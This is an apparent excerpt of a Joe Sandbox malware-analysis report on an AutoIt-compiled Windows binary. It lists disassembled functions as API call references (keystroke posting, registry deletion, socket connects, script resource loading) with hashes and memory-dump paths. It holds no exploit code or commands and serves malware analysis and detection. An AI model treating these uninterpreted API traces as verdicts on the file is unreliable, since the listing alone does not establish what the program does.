                                                                  • Opcode Fuzzy Hash: 0ac85c3779df44621ab719b794fadefda4282a23e2ff785b8e685833a772075d
                                                                  • Instruction Fuzzy Hash: 7D51D4A0E087D53DFB368624CC55BBA7EE97B06330F0C8989E0D5468C2C6D89C98F760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 00F315A4
                                                                  • GetKeyboardState.USER32(?), ref: 00F315B9
                                                                  • SetKeyboardState.USER32(?), ref: 00F3161A
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F31646
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F31663
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F316A7
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F316C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: f33a6d11febefcfd2de9f9307edcd4ce318a3fdef66d5116f5fcd9357b536b05
                                                                  • Instruction ID: 4c7e5aaa5985f3697ee37085520bb7579c9ffce3a7caeb7c0960e4e28abe5967
                                                                  • Opcode Fuzzy Hash: f33a6d11febefcfd2de9f9307edcd4ce318a3fdef66d5116f5fcd9357b536b05
                                                                  • Instruction Fuzzy Hash: 3651E4A0A047D53DFB328764CC56BBA7EA97B05330F0C4589E0D5468C2C794EC98F761
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 2945705084-0
                                                                  • Opcode ID: 7487e623a0afc9005ed7ed8d423e226412873e17bf9728a6337f0feb1c8a1154
                                                                  • Instruction ID: 05fbfc44e34fc79629a37e48defb3e44e92bc27d61a5dc67e09fa8377ac6935b
                                                                  • Opcode Fuzzy Hash: 7487e623a0afc9005ed7ed8d423e226412873e17bf9728a6337f0feb1c8a1154
                                                                  • Instruction Fuzzy Hash: 00419FA6C5161C75CB11FBB4C8469DFB3F8AF04320F50A866EA09E3161E734A21583A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33B8A,?), ref: 00F34BE0
                                                                    • Part of subcall function 00F34BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33B8A,?), ref: 00F34BF9
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00F33BAA
                                                                  • _wcscmp.LIBCMT ref: 00F33BC6
                                                                  • MoveFileW.KERNEL32(?,?), ref: 00F33BDE
                                                                  • _wcscat.LIBCMT ref: 00F33C26
                                                                  • SHFileOperationW.SHELL32(?), ref: 00F33C92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 1377345388-1173974218
                                                                  • Opcode ID: 626d8b733f37a47f0a6aef7a69bdc20a0473e267713e02aaf2b22b95d6119344
                                                                  • Instruction ID: ad3dc03d4428f3d6965fa7de44b725d4df813843197e9aed4253886490b216ee
                                                                  • Opcode Fuzzy Hash: 626d8b733f37a47f0a6aef7a69bdc20a0473e267713e02aaf2b22b95d6119344
                                                                  • Instruction Fuzzy Hash: 4E41A27150C3449AC752EF64D881AEFB7ECAF88360F50196EF489D3291EB34E688D752
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F578CF
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57976
                                                                  • IsMenu.USER32 ref: 00F5798E
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F579D6
                                                                  • DrawMenuBar.USER32 ref: 00F579E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                  • String ID: 0
                                                                  • API String ID: 3866635326-4108050209
                                                                  • Opcode ID: 1620d9f15f55957f2c8762d05d8939270adb1cdaa91244bc10c38c8c0a92107f
                                                                  • Instruction ID: c3844039d3127712b8deec94bba54d08401dd5152d77717d3ac4d0cad5d76fe3
                                                                  • Opcode Fuzzy Hash: 1620d9f15f55957f2c8762d05d8939270adb1cdaa91244bc10c38c8c0a92107f
                                                                  • Instruction Fuzzy Hash: 06416A71A08348EFDB20EF54E884E9ABBF9FB05321F148129EE5597250C770AD54EFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F51631
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5165B
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00F51712
                                                                    • Part of subcall function 00F51602: RegCloseKey.ADVAPI32(?), ref: 00F51678
                                                                    • Part of subcall function 00F51602: FreeLibrary.KERNEL32(?), ref: 00F516CA
                                                                    • Part of subcall function 00F51602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F516ED
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F516B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 395352322-0
                                                                  • Opcode ID: 38235a6ddda225fe81c8eed923561c292643e14e139130f4b489ffedaeb7d3c2
                                                                  • Instruction ID: 705739539d1eb459bd8be98a12c3d12ff34b7e2b7f2f076768e30af317e499df
                                                                  • Opcode Fuzzy Hash: 38235a6ddda225fe81c8eed923561c292643e14e139130f4b489ffedaeb7d3c2
                                                                  • Instruction Fuzzy Hash: E5311C7190010DBFDB149B94DC85FFFB7BCEF08311F140169EA11A2151EAB4AE49AAA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F56911
                                                                  • GetWindowLongW.USER32(012786F8,000000F0), ref: 00F56944
                                                                  • GetWindowLongW.USER32(012786F8,000000F0), ref: 00F56979
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F569AB
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F569D5
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00F569E6
                                                                  • SetWindowLongW.USER32 ref: 00F56A00
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: c196e27bb943a391b5ef5bd07c8b1538250f00e1441bfe6411c828f6f74b7f27
                                                                  • Instruction ID: 6a0b8776f632770019a581eee7ab6f92661bb4ac639449ccc6d26bb538751786
                                                                  • Opcode Fuzzy Hash: c196e27bb943a391b5ef5bd07c8b1538250f00e1441bfe6411c828f6f74b7f27
                                                                  • Instruction Fuzzy Hash: F2313930A042599FDB21CF18DC88F6537E1EB49361F6901A5FA25CB2B2CB72AC44EB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E2CA
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E2F0
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00F2E2F3
                                                                  • SysAllocString.OLEAUT32(?), ref: 00F2E311
                                                                  • SysFreeString.OLEAUT32(?), ref: 00F2E31A
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00F2E33F
                                                                  • SysAllocString.OLEAUT32(?), ref: 00F2E34D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 1069c516005fab9ad72015f79aec160afa647ffc7215f3750c810a3b35ed5a63
                                                                  • Instruction ID: 5657620cb27ede0df425223a265138489a290eb55684b41db263f7ac71d1ab97
                                                                  • Opcode Fuzzy Hash: 1069c516005fab9ad72015f79aec160afa647ffc7215f3750c810a3b35ed5a63
                                                                  • Instruction Fuzzy Hash: 85219576A0421DFF9F10DFA8DC88DBB77ACEB09360B148125FA15DB250DAB0AC459760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F48475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F484A0
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F468B1
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F468C0
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F468F9
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00F46902
                                                                  • WSAGetLastError.WSOCK32 ref: 00F4690C
                                                                  • closesocket.WSOCK32(00000000), ref: 00F46935
                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F4694E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 910771015-0
                                                                  • Opcode ID: 912614286830949b38748c1960d51404dcb2a2a1134e53572e42fda91c869d69
                                                                  • Instruction ID: 4310784aac1a5087f8513a4fb87eb3de262fea712d29bae3dbe35a5c3748b1bf
                                                                  • Opcode Fuzzy Hash: 912614286830949b38748c1960d51404dcb2a2a1134e53572e42fda91c869d69
                                                                  • Instruction Fuzzy Hash: 8731C471600218AFDB109F64CC85BBE7BA9EF45721F044019FD05E72D1CBB4AC45ABA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E3A5
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2E3CB
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00F2E3CE
                                                                  • SysAllocString.OLEAUT32 ref: 00F2E3EF
                                                                  • SysFreeString.OLEAUT32 ref: 00F2E3F8
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00F2E412
                                                                  • SysAllocString.OLEAUT32(?), ref: 00F2E420
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 159750e85a3c989ff89d39d62b97c502b7f8f746fa5adc0459c3a2cc83d4439f
                                                                  • Instruction ID: 365cf67546be3b3547c5829bf7dc20fffd935f19b0e62b5478c725dee34a899e
                                                                  • Opcode Fuzzy Hash: 159750e85a3c989ff89d39d62b97c502b7f8f746fa5adc0459c3a2cc83d4439f
                                                                  • Instruction Fuzzy Hash: 5D216B36604118AF9B10EFB8EC88DBF77ECEB093607248565FA15CB261DAB1EC419764
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: c0e797fd739164f402962101adf50890e54869996539d712696ddf1ae5876b88
                                                                  • Instruction ID: d1f730d13284d3ff56c2c6d57c1c09df267a45652d76708e0889a52031815fef
                                                                  • Opcode Fuzzy Hash: c0e797fd739164f402962101adf50890e54869996539d712696ddf1ae5876b88
                                                                  • Instruction Fuzzy Hash: DC216A3351097566D332BA34EC02FBB73E89F50320F51403AF946971A3EB959D4AA395
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED2111: CreateWindowExW.USER32 ref: 00ED214F
                                                                    • Part of subcall function 00ED2111: GetStockObject.GDI32(00000011), ref: 00ED2163
                                                                    • Part of subcall function 00ED2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F57C57
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F57C64
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F57C6F
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F57C7E
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F57C8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: fbe71d48f6f8b3a0bd56530a8aa46d0a3e0d4505c541ce5830dd5d833d5163d9
                                                                  • Instruction ID: 12539ba02c68a9d4d6a185c43739557ee7d61aa9665be2adf1cda1bc38bf6cbf
                                                                  • Opcode Fuzzy Hash: fbe71d48f6f8b3a0bd56530a8aa46d0a3e0d4505c541ce5830dd5d833d5163d9
                                                                  • Instruction Fuzzy Hash: 211186B255021DBEEF159F64CC85EE77F5DEF08758F014115BB04A6090C772AC25EBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F20817,?,?,00000000,00000000), ref: 00F39EE8
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F20817,?,?,00000000,00000000), ref: 00F39EFF
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00F20817,?,?,00000000,00000000,?,?,?,?,?,?,00EE4A14), ref: 00F39F0F
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00F20817,?,?,00000000,00000000,?,?,?,?,?,?,00EE4A14), ref: 00F39F20
                                                                  • LockResource.KERNEL32(00F20817,?,?,00F20817,?,?,00000000,00000000,?,?,?,?,?,?,00EE4A14,00000000), ref: 00F39F2F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: a93633534bebb298775b5b3a2f61b7511817ff2102b4c07f4b1b3e255c419e29
                                                                  • Instruction ID: 0151a9811bb8f20a764bbb41f4412c6dfa9a483891c06204e7e55643aa12bb86
                                                                  • Opcode Fuzzy Hash: a93633534bebb298775b5b3a2f61b7511817ff2102b4c07f4b1b3e255c419e29
                                                                  • Instruction Fuzzy Hash: BB115A70604704AFE7248B69DC48F277BB9EFC5B21F204668F519D62A0DBF1EC04E660
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 00EF9D16
                                                                    • Part of subcall function 00EF33B7: RtlEncodePointer.NTDLL(00000000), ref: 00EF33BA
                                                                    • Part of subcall function 00EF33B7: __initp_misc_winsig.LIBCMT ref: 00EF33D5
                                                                    • Part of subcall function 00EF33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EFA0D0
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EFA0E4
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EFA0F7
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EFA10A
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EFA11D
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EFA130
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EFA143
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EFA156
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EFA169
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EFA17C
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EFA18F
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EFA1A2
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EFA1B5
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EFA1C8
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EFA1DB
                                                                    • Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EFA1EE
                                                                  • __mtinitlocks.LIBCMT ref: 00EF9D1B
                                                                  • __mtterm.LIBCMT ref: 00EF9D24
                                                                    • Part of subcall function 00EF9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EF9D29,00EF7EFD,00F8CD38,00000014), ref: 00EF9E86
                                                                    • Part of subcall function 00EF9D8C: _free.LIBCMT ref: 00EF9E8D
                                                                    • Part of subcall function 00EF9D8C: DeleteCriticalSection.KERNEL32(00F90C00,?,?,00EF9D29,00EF7EFD,00F8CD38,00000014), ref: 00EF9EAF
                                                                  • __calloc_crt.LIBCMT ref: 00EF9D49
                                                                  • __initptd.LIBCMT ref: 00EF9D6B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EF9D72
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 3567560977-0
                                                                  • Opcode ID: ed783fad49e40966798ef6405c2db4baf7dcde7f16be8e5ea9246204a1e8d603
                                                                  • Instruction ID: 4f3f524ddccade50e1cb64bcc72f095cf4a5ea1e5c9552c3c2f36689a240c4e8
                                                                  • Opcode Fuzzy Hash: ed783fad49e40966798ef6405c2db4baf7dcde7f16be8e5ea9246204a1e8d603
                                                                  • Instruction Fuzzy Hash: 83F06D3260A72D6AE7347B747C0377A26D4DB81774F31261AF6E4F51D3EF1289014190
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
